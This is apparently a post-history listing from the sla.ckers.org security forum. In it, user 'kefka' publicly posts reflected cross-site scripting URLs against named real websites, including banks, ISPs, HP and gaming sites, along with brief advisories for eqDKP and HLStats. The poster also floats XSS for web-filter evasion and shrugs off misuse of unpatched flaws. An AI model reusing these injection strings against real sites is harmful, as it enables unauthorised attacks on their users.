Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
The ha.ckers.org and sla.ckers.org web application security lab house rules and a place for you to introduce yourself if you like. 

Current Page: 1 of 1
Results 1 - 23 of 23
2 years ago
kefka
barbarianbob Wrote: ------------------------------------------------------- > Hey Divine_Defender. It's me, Divine_Fire and I > regret nothing!! http://i.imgur.com/tJPyG.gif lol.. -- Let us know, when you get caught up, if you have anything interesting to share.
Forum: Intro
6 years ago
kefka
For the record, it's even more painful if your default application is something monstrous (like Lotus Notes). Just imagine, I'm sure you'll chuckle.
Forum: DoS
6 years ago
kefka
Those are from January, bro. QuoteRe: Myspace new Posted by: rsnake (IP Logged) Date: January 15, 2007 01:12AM
Forum: Full Disclosure
7 years ago
kefka
http://www.lewt.com/index.php?keywords=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3C/&x=0&y=0&cp=advanced_search&keyword=%27%27%3B%21--&%7B%28%29%7D=&gid=&server_id=&category_id=
Forum: Full Disclosure
7 years ago
kefka
Errr...that site is using 1.3.1 but the most recent version -is- vulnerable.
Forum: Full Disclosure
7 years ago
kefka
XSS in eqDKP 1.3.2c and prior $path-to-eqdkp/listemembers.php?show="><plaintext> example: http://www.hellbornguild.com/dkpbc1/listmembers.php?show=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E%3C/
Forum: Full Disclosure
7 years ago
kefka
.mario Wrote: ------------------------------------------------------- > Maybe it would also make sense to post a poc which > works with an inclusion - an alert proofs > nothing. > > What do you think? The fact that javascript is executed says a lot. Maybe this discussion is more appropriate in a seperate thread. What do you think?
Forum: Full Disclosure
7 years ago
kefka
Are you legally in the correct position to give one of us permission to do penetration testing?
Forum: OMG Ponies
7 years ago
kefka
http://help.mapquest.com/jive/kbsearch.jspa?forceEmptySearch=true&advanced=false&childCatID=0&rankBy=10001&parentCatID=1&searchQuery=%22%3E%3Cscript%3Ealert%28%22kefka+owns+mapquest%22%29%3C%2Fscript%3E%3C%2F http://search.about.com/fullsearch.htm?TopNode=%2F&terms=%22%3E%3Cscript%3Ealert%28%22kefka+owns+about.com%22%29%3C%2Fscript%3E%3C%2F&x=36&y=9 http://custom.
Forum: Full Disclosure
7 years ago
kefka
I see where you're coming from maluc but I don't think it would be a good idea for them to have users submitting the content to Google's search engine.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
kefka
Nice finds, another XSS on youtube came across the FullDisclosure mailing list today. http://seclists.org/fulldisclosure/2006/Dec/0436.html
Forum: Full Disclosure
7 years ago
kefka
http://bsdvault.net/search.php?query=%22%3E%3CSCRIPT%3Ealert%28%22kefka%20was%20here%22%29%3C%2FSCRIPT%3E
Forum: Full Disclosure
7 years ago
kefka
I don't know about WebSense. But it blocked it when I banned facebook.com at home from my Proventia M10. Thanks for the help though. id your method worked just fine, that article rocks. Thanks. I'll let you know about WebSense, I'll see what I can do about being there to make sure they try correctly.
Forum: Full Disclosure
7 years ago
kefka
How about XSS as a means of web filter evasion? :) EG. WebSense blocking a website.
Forum: Full Disclosure
8 years ago
kefka
http://wachovia.mworld.com/m/m.w?lp=Search&type=a&mt=1&ticker=%3Cscript%3Ealert%28%22walk-all-ova-ya%22%29%3C%2Fscript%3E&ty.x=Find&fn=on&fs=on&fsc=on&Col=1&Dir=1&st=&gl=1 Damn banks.
Forum: Full Disclosure
8 years ago
kefka
http://h20000.www2.hp.com/bizsupport/TechSupport/ProdSearch.jsp?lang=en&cc=us&taskId=135&prod=%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E
Forum: Full Disclosure
8 years ago
kefka
I pretty much follow a variety of formats depending on my mood but if they don't reply, I become resentful (usually). I post them here, on milw0rm and a couple of other places. If someone gets creative and fucks with them, they'll fix it. It's pretty unorthodox but it's also not _my_ problem, it's theirs.
Forum: Full Disclosure
8 years ago
kefka
I'll be any IP with over 200 smurf responses. Mmmm..yeah.
Forum: Full Disclosure
8 years ago
kefka
http://comsearch.comcast.commerce.atomz.com/?q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&x=0&y=0 http://home.bellsouth.net/s/s.dll?spage=search%2Fresultshome1.htm&_pgoffset=0&startdate=01%2F01%2F2010&man=1&num=10&type=cat&SearchType=web&string=%22%3CSCRIPT%3Ealert%28%22kefka+was+here%22%29%3C%2FSCRIPT%3E%22&imageField.x=0&imageField.y=0&
Forum: Full Disclosure
8 years ago
kefka
Speaking of WoW, here's another major "WoW database" http://www.goblinworkshop.com/search2.html?s=%5C%22%3CSCRIPT%3Ealert%28%5C%22kefka%20was%20here%5C%22%29%3C%2FSCRIPT%3E%5C%22
Forum: Full Disclosure
8 years ago
kefka
Yes, sir there are. I've thought a lot about it. In World of Warcraft, you're allowed to make custom UI mods. A lot of the game takes place in what they call "raid content" aka 40 man dungeons. 40 players going into a dungeon, basically. Well, damn near all of these guilds that run these dungeons require you to run a few mods that I've been interested in exploiting but I'm just a be
Forum: Full Disclosure
8 years ago
kefka
Cross-site Scripting Vulnerability in HLStats <= 1.34 hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22 Search module fails to sanitize quotes. kefka kefka@kevinbeardsucks.com Thanks RSnake
Forum: Full Disclosure
8 years ago
kefka
http://www.serverspy.net/site/stats/mods.html?g=0%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E http://www.allakhazam.com/fsearch.html?subject=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22&content=&poster=&date1_m=1&date1_d=1&date1_y=1999&date2_m=1&date2_d=1&date2_y=2007&cats=all&dosearch=1 Major gaming websites, one for FPS games o
Forum: Full Disclosure
Current Page: 1 of 1